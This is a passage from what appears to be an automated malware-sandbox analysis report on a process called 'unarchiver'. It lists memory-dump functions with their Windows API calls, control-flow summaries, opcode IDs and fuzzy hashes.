                                                                                      control_flow_graph 262 cfa6ae-cfa706 265 cfa70b-cfa717 262->265 266 cfa708 262->266 267 cfa71c-cfa725 265->267 268 cfa719 265->268 266->265 269 cfa727-cfa72f CreateFileW 267->269 270 cfa776-cfa77b 267->270 268->267 271 cfa735-cfa74b 269->271 270->269 273 cfa77d-cfa782 271->273 274 cfa74d-cfa773 271->274 273->274
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 259c0c1b09e71a55d6a125d21ae76445ac38c4fbfe88ed29d4d46c79e986d961
                                                                                      • Instruction ID: f61f28ef776a5441e034654eacb994af0afb3c8c46484e1fcb2bc51bf21724bf
                                                                                      • Opcode Fuzzy Hash: 259c0c1b09e71a55d6a125d21ae76445ac38c4fbfe88ed29d4d46c79e986d961
                                                                                      • Instruction Fuzzy Hash: 5621A1B1500204AFEB20DF65DD85F66FBF8EF08310F14846EEA498B651D371E908CB62
                                                                                      Function 00CFA83F Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 277 cfa83f-cfa8bd 281 cfa8bf-cfa8d2 GetFileType 277->281 282 cfa8f2-cfa8f7 277->282 283 cfa8f9-cfa8fe 281->283 284 cfa8d4-cfa8f1 281->284 282->281 283->284
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA8C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: b8b61fbea89983ba5cdffc5fc1e7e4f938c6aa19d9431086188c9931d1333830
                                                                                      • Instruction ID: 2256f28b4195caab8ea20aa9422e10522f5c6fb8d502a2b11dd9b167f6910c5d
                                                                                      • Opcode Fuzzy Hash: b8b61fbea89983ba5cdffc5fc1e7e4f938c6aa19d9431086188c9931d1333830
                                                                                      • Instruction Fuzzy Hash: 6821D8B54093846FE7128B11DC40BB2BFB8DF46314F1880DAE9849B293D264A909C772
                                                                                      Function 00CFAC54 Relevance: 1.6, APIs: 1, Instructions: 72pipeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 288 cfac54-cfad17 CreatePipe
                                                                                      APIs
                                                                                      • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00CFACE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreatePipe
                                                                                      • String ID:
                                                                                      • API String ID: 2719314638-0
                                                                                      • Opcode ID: fd6fa9d3972d86e79351b6cf71c68afc7d322f0b8d151add14985db25737340d
                                                                                      • Instruction ID: d44d86d253d8c9116dcca583485acc2e063dd877eeb2ed50f86ca0d2d9d3b7ef
                                                                                      • Opcode Fuzzy Hash: fd6fa9d3972d86e79351b6cf71c68afc7d322f0b8d151add14985db25737340d
                                                                                      • Instruction Fuzzy Hash: 8021DA725093846FC311CB25CC95F66BFB8EF86610F1984DFD8489B653D234B819CBA2
                                                                                      Function 00CFAABB Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFAB3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 4241100979-0
                                                                                      • Opcode ID: 99861f8c3569647326fb53dcfcdc0c9d86f549e03a6f82dea952c8c9c62d0887
                                                                                      • Instruction ID: 39cf82cc962de4f9d53d903a131d130560656a60eb351033ce5960517466ae8c
                                                                                      • Opcode Fuzzy Hash: 99861f8c3569647326fb53dcfcdc0c9d86f549e03a6f82dea952c8c9c62d0887
                                                                                      • Instruction Fuzzy Hash: 1821C5B15083C45FD712CB25DC95B92FFE8AF06314F0984EAE989CF153D264D909CB62
                                                                                      Function 00CFA392 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA40C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: f1d4e390adb678a275c9dc3ad2c328ef948f2a116f77b5723964b14e2df634cb
                                                                                      • Instruction ID: d14c021b0f93901601a37841b38ebc854c4382ff9241a72952ed6d79599b7d8c
                                                                                      • Opcode Fuzzy Hash: f1d4e390adb678a275c9dc3ad2c328ef948f2a116f77b5723964b14e2df634cb
                                                                                      • Instruction Fuzzy Hash: 60218EB55002089FEB61CF15DC84FB6FBECEF04710F14846AEA499B651D374E909DA72
                                                                                      Function 00CFAA12 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFAA71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 65fb1cee2c18c93eab93b3ae4057662d10ebfd1f19c1cba1ac320cec7e6364d8
                                                                                      • Instruction ID: dcafe24310c239591aa5d6146e266a23c92de7f3b32d46bd0bf1b7827bbfc514
                                                                                      • Opcode Fuzzy Hash: 65fb1cee2c18c93eab93b3ae4057662d10ebfd1f19c1cba1ac320cec7e6364d8
                                                                                      • Instruction Fuzzy Hash: 5A11BF72400204AFEB21CF51DE44FA6FBF8EF44324F24846AEA499A651D374A508DFB2
                                                                                      Function 00CFA932 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA98E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 40753fe86ba5e089512ccab6d470a81067003a9f6f67a06a281c68731d501a6d
                                                                                      • Instruction ID: 49b195ec7daca4cd745751761cc343201f982f444aef8072307ca51dc31f5fd2
                                                                                      • Opcode Fuzzy Hash: 40753fe86ba5e089512ccab6d470a81067003a9f6f67a06a281c68731d501a6d
                                                                                      • Instruction Fuzzy Hash: 7D11C172400204AFEB21DF55DD84BB6FBE8EF44324F24C46AEA499B641D374A5088BB2
                                                                                      Function 00CFA2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: bddab408367f375257fa0006215544d881fe9dac63a643a0d32fc0f30268ffc7
                                                                                      • Instruction ID: 41a0c5ab1c07be221d2982cb99cc768b7ab3dc090adfe2642bdcfb2e78081ed5
                                                                                      • Opcode Fuzzy Hash: bddab408367f375257fa0006215544d881fe9dac63a643a0d32fc0f30268ffc7
                                                                                      • Instruction Fuzzy Hash: FC11A3B54093C49FD7228B25DC54A62FFB4DF17220F0984DBED898F163D265A908CB72
                                                                                      Function 00CFA5DC Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,?), ref: 00CFA636
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 82841172-0
                                                                                      • Opcode ID: f3fab7790d19f6af476e44f7a1151610b5f352a29fca72e286402ab3529b9d32
                                                                                      • Instruction ID: eb2b673c2a47773b867c72c73194dd25280fd3ff5e4f45ba638a1eea2bb893a7
                                                                                      • Opcode Fuzzy Hash: f3fab7790d19f6af476e44f7a1151610b5f352a29fca72e286402ab3529b9d32
                                                                                      • Instruction Fuzzy Hash: 1E1182714093849FD711CF55DC44B56FFF4EF46320F0884AAE9498F262D375A808CB62
                                                                                      Function 00CFB264 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNELBASE(?), ref: 00CFB2B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 31276548-0
                                                                                      • Opcode ID: 839d8f21e1f0b36bc0966e544d34c2783b900468b63bbc1f22c0c6e5c7425725
                                                                                      • Instruction ID: 9d399b98ba7b92f218558790316e370a664de2e96a4a063f8aadda6f1e42d642
                                                                                      • Opcode Fuzzy Hash: 839d8f21e1f0b36bc0966e544d34c2783b900468b63bbc1f22c0c6e5c7425725
                                                                                      • Instruction Fuzzy Hash: 1A118E714093849FDB12CF15DC94B56FFB4EF56220F0884EAED898F253D275A908CB62
                                                                                      Function 00CFAAF6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFAB3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 4241100979-0
                                                                                      • Opcode ID: 0b9ff2fa821c2b1d062d1e687d736d58b3f228e678f71a5f959b3fba177a21a6
                                                                                      • Instruction ID: 3f5b2e066e2f71e9ed3240e5f74b2d261fc027e22b211bbd2e37bccbfc22830f
                                                                                      • Opcode Fuzzy Hash: 0b9ff2fa821c2b1d062d1e687d736d58b3f228e678f71a5f959b3fba177a21a6
                                                                                      • Instruction Fuzzy Hash: A31161B16042449FDB50CF25D985B66FBE8EF04320F18C4AAEE49CB652E374E944CB63
                                                                                      Function 00CFA872 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA8C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: 59d7753269db8c802d3db910470c2c2c3cb14701cc2f56d72e72457ea66192e7
                                                                                      • Instruction ID: 8697ac42f6e322d36452580a920d37988974cc0b07d1e54ceaec5ba0aee08bbd
                                                                                      • Opcode Fuzzy Hash: 59d7753269db8c802d3db910470c2c2c3cb14701cc2f56d72e72457ea66192e7
                                                                                      • Instruction Fuzzy Hash: D901D675501344AEE710CB05DD84BB6F7E8DF44724F24C09AEE099B781D3B4E9498AB6
                                                                                      Function 00CFB03B Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 3131c81bb4d714bcf4bf8b727150cbeb57d5617fa80929dab95bcfc23ff464d4
                                                                                      • Instruction ID: 709838d19b450e7b5a6a919344adf2dd1b1e7619f0a8ee72d010462ea607a875
                                                                                      • Opcode Fuzzy Hash: 3131c81bb4d714bcf4bf8b727150cbeb57d5617fa80929dab95bcfc23ff464d4
                                                                                      • Instruction Fuzzy Hash: 4E11A0B15093C49FD7128B25DC85B52BFF4EF06220F0984DAED858B263C374A808CB62
                                                                                      Function 00CFA172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00CFA1C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindNext
                                                                                      • String ID:
                                                                                      • API String ID: 2029273394-0
                                                                                      • Opcode ID: fa6e685a78755126bbe63782087601d99494b464890a18978df70de7415fc2be
                                                                                      • Instruction ID: 1e5b50bc2a1e3f64c530daace9db8e06ffba5d1e255b78a835f5f4c0dfe579e0
                                                                                      • Opcode Fuzzy Hash: fa6e685a78755126bbe63782087601d99494b464890a18978df70de7415fc2be
                                                                                      • Instruction Fuzzy Hash: 1B019E71500200AFD210DF16CD86B76FBF8EB88A20F14816AEC089B741D731B9158BA1
                                                                                      Function 00CFAC96 Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00CFACE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreatePipe
                                                                                      • String ID:
                                                                                      • API String ID: 2719314638-0
                                                                                      • Opcode ID: a84e7e32962ef1d1021f573360aaa3fbfbaf585f1330a83dd3f0c6de4d66ca3f
                                                                                      • Instruction ID: bc53279b98e761da123d8a09457b499aab11fdede32f0a2c06005dd4e073a961
                                                                                      • Opcode Fuzzy Hash: a84e7e32962ef1d1021f573360aaa3fbfbaf585f1330a83dd3f0c6de4d66ca3f
                                                                                      • Instruction Fuzzy Hash: F7015E71500600AFD214DF16DD86B76FBF8FB88A20F14856AED089B741D731B915CBA5
                                                                                      Function 00CFA5FE Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,?), ref: 00CFA636
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 82841172-0
                                                                                      • Opcode ID: 2146ac5679070e52723798ed9a33d41cee64101d8319092262b2d7176ea535f1
                                                                                      • Instruction ID: 4d68f8d1cd4ea42d9204358b26ac735e8222b2509583f58ab9bc7ad169abdc0d
                                                                                      • Opcode Fuzzy Hash: 2146ac5679070e52723798ed9a33d41cee64101d8319092262b2d7176ea535f1
                                                                                      • Instruction Fuzzy Hash: 07015AB14042489FDB60CF55D984B66FBE4EF44320F18C4AAEE498B652D375A818DB62
                                                                                      Function 00CFB062 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: e88998f4b9ec225f4ce7a9bfd766e353deb51b76640d2a06ad01bc42bb9c6332
                                                                                      • Instruction ID: db9f48b08ea4582cf6e9e893053ec4c226becdc60d2de3e5ffc13f4fffa1b0cc
                                                                                      • Opcode Fuzzy Hash: e88998f4b9ec225f4ce7a9bfd766e353deb51b76640d2a06ad01bc42bb9c6332
                                                                                      • Instruction Fuzzy Hash: 2B01D1B55002488FDB508F16D885766FBE4EF04320F18C0AADE198B752D775E908DAA2
                                                                                      Function 00CFA2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: c7de6fd814c73e6dc0b508e523172b8a8730ad6507172458fcf5e1aab64af638
                                                                                      • Instruction ID: 4890ce8b5d335ba9373590a0f27117d99b9c3ccb93191c5af398da99667968a3
                                                                                      • Opcode Fuzzy Hash: c7de6fd814c73e6dc0b508e523172b8a8730ad6507172458fcf5e1aab64af638
                                                                                      • Instruction Fuzzy Hash: B0F0A4754042488FDB50DF06D884765FBE4EF44724F18C09ADE094B762D375E918DA63
                                                                                      Function 00CFA784 Relevance: 1.3, APIs: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00CFA7F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 14cf458ddb88df6d6c0bf63939cdf2294cac03e69a9422d1b1d0fab9275cd0cb
                                                                                      • Instruction ID: 7b18891b7a9d5671728a6e7025d3f9727499a320152444df44283495c3c458c4
                                                                                      • Opcode Fuzzy Hash: 14cf458ddb88df6d6c0bf63939cdf2294cac03e69a9422d1b1d0fab9275cd0cb
                                                                                      • Instruction Fuzzy Hash: 152104B55093C05FCB138B25DC91752BFB8EF07320F0984EAED858F2A3D2649909C762
                                                                                      Function 00CFA7C6 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00CFA7F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 1341f5ecae4630e34a6c821c065a3914c980e628c04720596def47859ed73987
                                                                                      • Instruction ID: 7194452debd9b36dfe4e88b618d198f543242fe39f70d59c7557fae6399927e1
                                                                                      • Opcode Fuzzy Hash: 1341f5ecae4630e34a6c821c065a3914c980e628c04720596def47859ed73987
                                                                                      • Instruction Fuzzy Hash: 4701DFB19003448FDB50CF15D885766FBE4EF04320F18C4AADD098B682D2B9E948DAA3
                                                                                      Function 00E002C0 Relevance: .3, Instructions: 285COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6cb4cbf81d3f838d2d57b058f2a7b5f92fd38ed13e3187c0892bda0074df420
                                                                                      • Instruction ID: 7cbffcb4f6cb3043c41b7f9a510b34a909ac3b2fd9f41f7e84c4def74ef2bb67
                                                                                      • Opcode Fuzzy Hash: f6cb4cbf81d3f838d2d57b058f2a7b5f92fd38ed13e3187c0892bda0074df420
                                                                                      • Instruction Fuzzy Hash: 55B13C38701310CFD718EF64EA58F9A77B6EF88348B508429D906973A8DB719D47CBA1
                                                                                      Function 00E00BA0 Relevance: .1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7c4f4ca0f9032a2a1bf283ba3186f52d0a230612915523be78e25adec2cb8cf
                                                                                      • Instruction ID: 6c2c179523bbed401455a8bec65cfdd5b2c9ca750eb3f65acffce7f38498695b
                                                                                      • Opcode Fuzzy Hash: b7c4f4ca0f9032a2a1bf283ba3186f52d0a230612915523be78e25adec2cb8cf
                                                                                      • Instruction Fuzzy Hash: A9118F36A10218AFDB04DBB8D848DDE7BF6FF88218B044479E205E7764DB31981A87D1
                                                                                      Function 00E10807 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f1b6cd9b4eccf5905a2c09a7dbe12daec02050fe8674e2135bb548efd10e0d8
                                                                                      • Instruction ID: ab53441b56d4cb66c3d4147fc52cd9802ec49f13f5802f1c857fb5e078569c3e
                                                                                      • Opcode Fuzzy Hash: 9f1b6cd9b4eccf5905a2c09a7dbe12daec02050fe8674e2135bb548efd10e0d8
                                                                                      • Instruction Fuzzy Hash: 840192B240D3446FD701DB14AC41C96BBF8EF86520B08856EFD488B602D326A9188BA2
                                                                                      Function 00E105DF Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d650538535a13aa5924efc7a3bd4da3c7f929015bfaa345d3f1af512de93a636
                                                                                      • Instruction ID: 3be5d955c89cb9c9d8227ae4971f065b0af3e7002dbd9d0763055774193b3827
                                                                                      • Opcode Fuzzy Hash: d650538535a13aa5924efc7a3bd4da3c7f929015bfaa345d3f1af512de93a636
                                                                                      • Instruction Fuzzy Hash: 8A01A2B65093806FD702CB15AC418A2FFF8EE86230748C49FEC4987A12D225B908C7B2
                                                                                      Function 00E1082E Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ec3914d0821cc3619b38e4d5393bf5b1c853b7b9e83548781191e4578933f2a
                                                                                      • Instruction ID: 96d46911ab7401853297c371414258bf8fbace44e6364d5c59a4d13c894c9700
                                                                                      • Opcode Fuzzy Hash: 6ec3914d0821cc3619b38e4d5393bf5b1c853b7b9e83548781191e4578933f2a
                                                                                      • Instruction Fuzzy Hash: A5F082B2805204AF9200DF05ED45866F7ECEF94521F54C52AFD088B701E276B9194AE2
                                                                                      Function 00E10606 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bde959a6ab1194fc65f25c384079c0a480308d3d292a7054d0e09b5b52d087fb
                                                                                      • Instruction ID: 4c99511af5ec0511bdafbcc1abb66c53d03a54513158919a0ba125ce40d4e8bf
                                                                                      • Opcode Fuzzy Hash: bde959a6ab1194fc65f25c384079c0a480308d3d292a7054d0e09b5b52d087fb
                                                                                      • Instruction Fuzzy Hash: B7E092B66046044B9650DF0AEC81462F7E8EB88630758C47FEC0D8B701E236B508CAA5
                                                                                      Function 00E00C50 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
